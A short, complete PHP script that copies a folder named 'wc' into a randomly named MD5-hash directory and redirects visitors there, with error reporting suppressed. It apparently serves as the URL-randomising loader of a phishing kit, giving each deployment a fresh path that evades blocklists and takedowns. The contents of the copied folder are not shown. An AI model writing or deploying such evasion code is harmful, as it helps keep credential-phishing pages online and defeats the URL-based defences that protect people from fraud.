<?php 
// Terima kasih banyak
error_reporting(0);
$mnHme='wc';

$filearray= ["first", "second", "third", "fourth", "mean", "purpose", "intervention", "inside", "middle", "medium", "translate", "read", "spokesperson", "crossing", "period", "bowel", "fascinate", "suspicion", "feeling", "flood", "finish"];

$file_rand = $filearray[mt_rand(0,20)];
$file_dir = md5($file_rand);

if (is_dir($file_dir)){
    header("location:$file_dir/index.php"); 
} else {
    function make_a_file($home,$file_dir) {
        $dir = opendir($home);
        mkdir($file_dir);
        while(false !== ( $file = readdir($dir)) ) {
            if (( $file != '.' ) && ( $file != '..' )) {
                if ( is_dir($home . '/' . $file) ) {
                    make_a_file($home . '/' . $file,$file_dir . '/' . $file);
                }
                else {
                    copy($home . '/' . $file,$file_dir . '/' . $file);
                }
            }
        }
        closedir($dir);
    }
    
    $home=$mnHme;
    make_a_file( $home, $file_dir );
    header("location:$file_dir/index.php");
    
}

?>